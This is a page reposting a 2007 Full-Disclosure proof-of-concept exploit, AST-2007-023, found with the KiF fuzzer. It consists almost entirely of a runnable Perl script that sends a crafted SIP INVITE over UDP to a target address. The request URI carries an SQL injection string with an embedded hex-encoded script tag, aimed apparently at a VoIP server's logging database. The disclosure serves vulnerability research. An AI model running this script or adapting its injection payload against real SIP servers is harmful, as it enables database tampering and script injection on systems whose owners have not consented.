Home / os / solaris

AST-2007-023-poc.txt

Posted on 19 October 2007

for testing purposes the POC of the vulnerabiliy discovered by the KIPH fuzzer RS #!/usr/bin/perl ############################################# # Vulnerabily discovered using KiF ~ Kiph # # # # Authors: # # Humberto J. Abdelnur (Ph.D Student) # # Radu State (Ph.D) # # Olivier Festor (Ph.D) # # # # Madynes Team, LORIA - INRIA Lorraine # # http://madynes.loria.fr # ############################################# use IO::Socket::INET; use String::Random; $foo = new String::Random; die "Usage $0 <callUser> <targetIP> <targetPort> <attackerUser> <localIP> <localPort>" unless ($ARGV[5]); sub iso2hex($) { my $hex = ''; for (my $i = 0; $i < length($_[0]); $i++) { my $ordno = ord substr($_[0], $i, 1); $hex .= sprintf("%lx", $ordno); } $hex =~ s/ $//;; $hex; } $callUser = $ARGV[0]; $targetIP = $ARGV[1]; $targetPort = $ARGV[2]; $attackerUser = $ARGV[3]; $attackerIP= $ARGV[4]; $attackerPort= $ARGV[5]; $socket=new IO::Socket::INET->new( Proto=>'udp', PeerPort=>$targetPort, PeerAddr=>$targetIP, LocalPort=>$attackerPort); $scriptinjection= iso2hex("<script>alert(1)</script>"); $sqlinjection= "',1,2,3,4,5,-9,-9,0x$scriptinjection,6,7,8)/*"; $callid= $foo->randpattern("CCccnCn"); $cseq = $foo->randregex('dddd'); $sdp = "v=0 o=Lupilu 63356722367567875 63356722367567875 IN IP4 $attackerIP s=- c=IN IP4 $attackerIP t=0 0 m=audio 49152 RTP/AVP 96 0 8 97 18 98 13 a=sendrecv a=ptime:20 a=maxptime:200 a=fmtp:96 mode-change-neighbor=1 a=fmtp:18 annexb=no a=fmtp:98 0-15 a=rtpmap:96 AMR/8000/1 a=rtpmap:0 PCMU/8000/1 a=rtpmap:8 PCMA/8000/1 a=rtpmap:97 iLBC/8000/1 a=rtpmap:18 G729/8000/1 a=rtpmap:98 telephone-event/8000/1 a=rtpmap:13 CN/8000/1 "; $sdplen= length $sdp; $msg = "INVITE sip:$sqlinjection@$targetIP SIP/2.0 Via: SIP/2.0/UDP $attackerIP;branch=z9hG4bK1;rport From: <sip:$attackerUser@$attackerIP>;tag=1 To: <sip:$callUser@$targetIP> Call-ID: $callid@$attackerIP CSeq: $cseq INVITE Max-Forwards: 70 Contact: <sip:$attackerUser@$attackerIP> Content-Type: application/sdp Content-Length: $sdplen $sdp"; $socket->send($msg); _______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/

 

TOP